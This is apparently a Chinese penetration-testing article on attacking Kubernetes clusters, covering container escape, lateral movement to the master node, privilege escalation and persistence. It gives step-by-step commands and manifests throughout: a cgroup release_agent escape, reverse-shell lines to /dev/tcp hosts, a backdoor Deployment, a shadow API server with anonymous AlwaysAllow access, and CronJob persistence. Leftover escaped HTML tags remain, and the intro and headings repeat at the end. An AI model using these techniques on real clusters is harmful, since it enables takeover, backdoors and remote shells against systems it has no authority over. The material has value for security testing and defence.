Kubernetes集群安全攻防（下）——逃逸、横向移动与权限维持技术详解<\/h1>

文章前言<\/h2>
本篇文章是"Kubernetes集群安全攻防(上)"的延续，重点补充Kubernetes环境中的容器逃逸技术、横向移动方法、权限维持手段以及相关扩展技巧。<\/p>

逃逸相关技术<\/h2>

配置不当导致的逃逸<\/h3>

Privileged特权模式逃逸<\/h4>

前置知识：<\/strong><\/p>

Security Context（安全上下文）用于定义Pod或Container的权限和访问控制<\/li>
Kubernetes提供三种配置Security Context的方法：

Pod Security Policy（集群级别）<\/li>
Pod-level Security Context（Pod级别）<\/li>
Container-level Security Context（容器级别）<\/li> <\/ul> <\/li> <\/ul>
容器级别特权配置示例：<\/strong><\/p>
apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: hello-world<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: hello-world-container<\/span> <\/span><\/span> image<\/span>: ubuntu:latest<\/span> <\/span><\/span> securityContext<\/span>: <\/span><\/span> privileged<\/span>: true<\/span> <\/span><\/span><\/code><\/pre>逃逸演示步骤：<\/strong><\/p> 拉取Ubuntu镜像：sudo docker pull ubuntu<\/code><\/li> 创建特权Pod的yaml文件<\/li> 创建Pod：kubectl create -f myapp-test.yaml<\/code><\/li> 进入Pod进行逃逸操作： kubectl exec -it myapp-test \/bin\/bash <\/span><\/span>fdisk -l # 查看磁盘<\/span> <\/span><\/span>cat \/proc\/self\/status | grep CapEff # 查看权限<\/span> <\/span><\/span>.\/cdk run mount-disk # 使用CDK工具逃逸<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> CAP_SYS_ADMIN配置逃逸<\/h4> 漏洞概述：<\/strong><\/p> Docker通过Linux Namespace实现资源隔离<\/li> 危险启动参数会打破资源隔离界限： --pid=host<\/code>：绕过PID Namespace<\/li> --ipc=host<\/code>：绕过IPC Namespace<\/li> --net=host<\/code>：绕过Network Namespace<\/li> --cap-add=SYS_ADMIN<\/code>：允许mount特权操作<\/li> <\/ul> <\/li> <\/ul> 利用前提：<\/strong><\/p> 容器内root用户<\/li> 容器使用SYS_ADMIN Linux capability运行<\/li> 容器缺少AppArmor配置文件<\/li> cgroup v1虚拟文件系统以读写方式安装在容器内部<\/li> <\/ol> 漏洞利用步骤：<\/strong><\/p> 创建临时目录并挂载memory cgroup： mkdir \/tmp\/cgrp &&<\/span> mount -t cgroup -o memory cgroup \/tmp\/cgrp <\/span><\/span><\/code><\/pre><\/li> 创建子目录：mkdir \/tmp\/cgrp\/x<\/code><\/li> 设置notify_no_release属性： echo 1<\/span> > \/tmp\/cgrp\/x\/notify_no_release <\/span><\/span><\/code><\/pre><\/li> 获取容器在宿主机上的存储路径： host_path=<\/span>`<\/span>sed -n 's\/.*\perdir=$[^,]*$.*\/\1\/p'<\/span> \/etc\/mtab`<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建恶意cmd文件： echo "<\/span>$host_path\/cmd"<\/span> > \/tmp\/cgrp\/release_agent <\/span><\/span>echo '#!\/bin\/sh'<\/span> > \/cmd <\/span><\/span>echo "sh -i >& \/dev\/tcp\/10.0.0.1\/8443 0>&1"<\/span> >> \/cmd <\/span><\/span>chmod a+x \/cmd <\/span><\/span><\/code><\/pre><\/li> 触发执行： sh -c "echo \$\$ > \/tmp\/cgrp\/x\/cgroup.procs"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> CAP_DAC_READ_SEARCH逃逸<\/h4> 影响范围：<\/strong> Docker 1.0及更早版本<\/p> 场景描述：<\/strong><\/p> 早期Docker容器默认拥有CAP_DAC_READ_SEARCH权限<\/li> 容器内进程可使用open_by_handle_at函数对宿主机文件系统暴力扫描<\/li> <\/ul> 漏洞复现步骤：<\/strong><\/p> 修改shocker.c中的目标文件路径（如改为\/etc\/hosts）<\/li> 编译POC：gcc shocker.c -o shocker<\/code><\/li> 将POC复制到容器内：docker cp \/path\/to\/shocker container_id:\/tmp\/shocker<\/code><\/li> 在容器内执行POC访问宿主机敏感文件<\/li> <\/ol> 内核漏洞逃逸<\/h3> 常见内核漏洞：<\/strong><\/p> CVE-2016-5195（脏牛漏洞）<\/li> CVE-2017-7308<\/li> CVE-2017-1000112<\/li> CVE-2021-22555<\/li> CVE-2021-31440（Linux eBPF）<\/li> CVE-2022-0185（Linux Kernel Escape）<\/li> <\/ul> 脏牛漏洞逃逸示例：<\/strong><\/p> 下载测试环境：git clone https:\/\/github.com\/gebl\/dirtycow-docker-vdso.git<\/code><\/li> 运行测试容器：sudo docker-compose run dirtycow \/bin\/bash<\/code><\/li> 编译执行POC： cd \/dirtycow-vdso\/ <\/span><\/span>make <\/span><\/span>.\/0xdeadbeef attacker_ip:port <\/span><\/span><\/code><\/pre><\/li> <\/ol> 危险挂载逃逸<\/h3> HostPath目录挂载<\/h4> 利用步骤：<\/strong><\/p> 确认容器具有主机系统完整权限<\/li> 发现危险挂载点（如\/host-system）<\/li> 使用chroot获取宿主机权限： chroot \/host-system bash <\/span><\/span><\/code><\/pre><\/li> 访问节点级别Kubernetes配置： cat \/var\/lib\/kubelet\/kubeconfig <\/span><\/span><\/code><\/pre><\/li> 使用kubelet配置操作集群资源<\/li> <\/ol> \/var\/log危险挂载<\/h4> 场景特点：<\/strong><\/p> Pod以可写权限挂载宿主机\/var\/log目录<\/li> Pod的ServiceAccount有权限访问该Pod在宿主机上的日志<\/li> <\/ol> 利用原理：<\/strong><\/p> 在容器内创建符号链接指向宿主机根目录<\/li> 构造包含该符号链接的恶意kubelet请求<\/li> 宿主机解析符号链接导致任意文件读取<\/li> <\/ul> 利用工具：<\/strong> https:\/\/github.com\/danielsagi\/kube-pod-escape<\/p> Procfs目录逃逸<\/h4> 利用步骤：<\/strong><\/p> 获取容器在宿主机上的绝对路径（通过\/proc\/mounts）<\/li> 修改\/proc\/sys\/kernel\/core_pattern： echo -e "|\/var\/lib\/docker\/overlay2\/...\/merged\/tmp\/.x.py \rcore"<\/span> > \/host-proc\/sys\/kernel\/core_pattern <\/span><\/span><\/code><\/pre><\/li> 在容器内创建反弹shell脚本\/tmp\/.x.py<\/li> 运行崩溃程序触发执行<\/li> <\/ol> 横向渗透技术<\/h2> 基本原理<\/h3> 利用K8s污点(Taints)和容忍度(Tolerations)特性<\/li> 主节点通常包含阻止Pod调度的污点<\/li> 系统级Pod可以容忍这些污点<\/li> <\/ul> 横向移动步骤<\/h3> 查看节点信息：kubectl get nodes<\/code><\/li> 确认Master节点容忍度： kubectl describe node master | grep 'Taints'<\/span> -A 5<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建带有容忍参数的Pod： apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: control-master-15<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> tolerations<\/span>: <\/span><\/span> - key<\/span>: node-role.kubernetes.io\/master<\/span> <\/span><\/span> operator<\/span>: Exists<\/span> <\/span><\/span> effect<\/span>: NoSchedule<\/span> <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: control-master-15<\/span> <\/span><\/span> image<\/span>: ubuntu:18.04<\/span> <\/span><\/span> command<\/span>: ["\/bin\/sleep"<\/span>, "3650d"<\/span>] <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - name<\/span>: master<\/span> <\/span><\/span> mountPath<\/span>: \/master<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: master<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span> type<\/span>: Directory<\/span> <\/span><\/span><\/code><\/pre><\/li> 通过挂载获取Master控制权： kubectl exec control-master-15 -it bash <\/span><\/span>chroot \/master bash <\/span><\/span><\/code><\/pre><\/li> <\/ol> 扩展技巧<\/h3> 清除污点直接部署Pod到Master节点：<\/p> kubectl taint nodes debian node-role.kubernetes.io\/master:NoSchedule- <\/span><\/span><\/code><\/pre>权限提升技术<\/h2> 相关CVE漏洞<\/h3> CVE-2018-1002105：Kubernetes API Server权限提升<\/li> CVE-2019-11247：Kubernetes API Server权限提升<\/li> CVE-2020-8559：Kubernetes API Server权限提升<\/li> <\/ol> Rolebinding权限提升实例<\/h3> 部署Kubernetes Dashboard<\/li> 获取默认token： kubectl describe secrets kubernetes-dashboard-token-xxxx -n kubernetes-dashboard <\/span><\/span><\/code><\/pre><\/li> 创建管理员ServiceAccount： kubectl create serviceaccount admin-myuser -n kubernetes-dashboard <\/span><\/span>kubectl create clusterrolebinding dashboard-cluster-admin --clusterrole=<\/span>cluster-admin --serviceaccount=<\/span>kubernetes-dashboard:admin-myuser <\/span><\/span><\/code><\/pre><\/li> 获取新token登录Dashboard<\/li> <\/ol> 权限维持技术<\/h2> Deployment特性利用<\/h3> 持久化原理：<\/strong><\/p> 使用Deployment确保特定数量Pod副本始终运行<\/li> 即使容器被清理也能自动恢复<\/li> <\/ul> 手动实现步骤：<\/strong><\/p> 创建包含恶意载荷的dep.yaml： apiVersion<\/span>: apps\/v1<\/span> <\/span><\/span>kind<\/span>: Deployment<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: nginx-deploy<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> replicas<\/span>: 3<\/span> <\/span><\/span> template<\/span>: <\/span><\/span> spec<\/span>: <\/span><\/span> hostNetwork<\/span>: true<\/span> <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: nginx<\/span> <\/span><\/span> image<\/span>: nginx:1.7.9<\/span> <\/span><\/span> command<\/span>: ["bash"<\/span>] <\/span><\/span> args<\/span>: ["-c"<\/span>, "bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1"<\/span>] <\/span><\/span> securityContext<\/span>: <\/span><\/span> privileged<\/span>: true<\/span> <\/span><\/span><\/code><\/pre><\/li> 部署后门Pod：kubectl create -f dep.yaml<\/code><\/li> <\/ol> 工具实现：<\/strong><\/p> .\/cdk run k8s-backdoor-daemonset (<\/span>default|anonymous|<token-path>)<\/span> <image> <\/span><\/span><\/code><\/pre>Shadow API Server技术<\/h3> 基本概述：<\/strong><\/p> 创建具有API Server功能的隐蔽Pod<\/li> 开放更大权限且不记录审计日志<\/li> <\/ul> 手动实现步骤：<\/strong><\/p> 复制kube-apiserver的YAML配置<\/li> 修改关键参数： - --allow-privileged=true<\/span> <\/span><\/span>- --insecure-port=6445<\/span> <\/span><\/span>- --insecure-bind-address=0.0.0.0<\/span> <\/span><\/span>- --secure-port=6445<\/span> <\/span><\/span>- --anonymous-auth=true<\/span> <\/span><\/span>- --authorization-mode=AlwaysAllow<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建Shadow API Server Pod<\/li> <\/ol> 工具实现：<\/strong><\/p> cdk run k8s-shadow-apiserver default <\/span><\/span><\/code><\/pre>K8s CronJob持久化<\/h3> 基本概述：<\/strong><\/p> 利用CronJob执行周期性任务<\/li> 设置定时执行的恶意命令<\/li> <\/ul> 手动实现：<\/strong><\/p> apiVersion<\/span>: batch\/v1beta1<\/span> <\/span><\/span>kind<\/span>: CronJob<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: hello<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> schedule<\/span>: "*\/1 * * * *"<\/span> <\/span><\/span> jobTemplate<\/span>: <\/span><\/span> spec<\/span>: <\/span><\/span> template<\/span>: <\/span><\/span> spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: hello<\/span> <\/span><\/span> image<\/span>: alpine<\/span> <\/span><\/span> command<\/span>: ["\/bin\/sh"<\/span>, "-c"<\/span>, "malicious_command"<\/span>] <\/span><\/span><\/code><\/pre>工具实现：<\/strong><\/p> .\/cdk run k8s-cronjob default min alpine "malicious_command"<\/span> <\/span><\/span><\/code><\/pre>推荐工具<\/h2> Nebula<\/strong>：云和DevOps渗透测试框架<\/p> GitHub: https:\/\/github.com\/gl4ssesbo1\/Nebula<\/li> <\/ul> <\/li> k0otkit<\/strong>：Kubernetes后渗透工具<\/p> 特点：使用kube-proxy镜像、动态容器注入、流量加密<\/li> <\/ul> <\/li> CDK Tools<\/strong>：容器环境渗透测试工具包<\/p> GitHub: https:\/\/github.com\/cdk-team\/CDK<\/li> <\/ul> <\/li> Kubesploit<\/strong>：跨平台后渗透利用框架<\/p> GitHub: https:\/\/github.com\/cyberark\/kubesploit<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> Kubernetes安全研究视频：https:\/\/youtu.be\/GupI5nUgQ9I<\/li> 容器逃逸实践：https:\/\/capsule8.com\/blog\/practical-container-escape-exercise\/<\/li> Linux内核漏洞利用：https:\/\/googleprojectzero.blogspot.com<\/li> Metarget漏洞环境：https:\/\/github.com\/Metarget\/metarget<\/li> <\/ol>

Kubernetes集群安全攻防（下）——逃逸、横向移动与权限维持技术详解<\/h1>

文章前言<\/h2> 本篇文章是"Kubernetes集群安全攻防(上)"的延续，重点补充Kubernetes环境中的容器逃逸技术、横向移动方法、权限维持手段以及相关扩展技巧。<\/p>

逃逸相关技术<\/h2>

配置不当导致的逃逸<\/h3>

危险挂载逃逸<\/h3>

横向渗透技术<\/h2>

权限提升技术<\/h2>

权限维持技术<\/h2>

文章前言<\/h2>
本篇文章是"Kubernetes集群安全攻防(上)"的延续，重点补充Kubernetes环境中的容器逃逸技术、横向移动方法、权限维持手段以及相关扩展技巧。<\/p>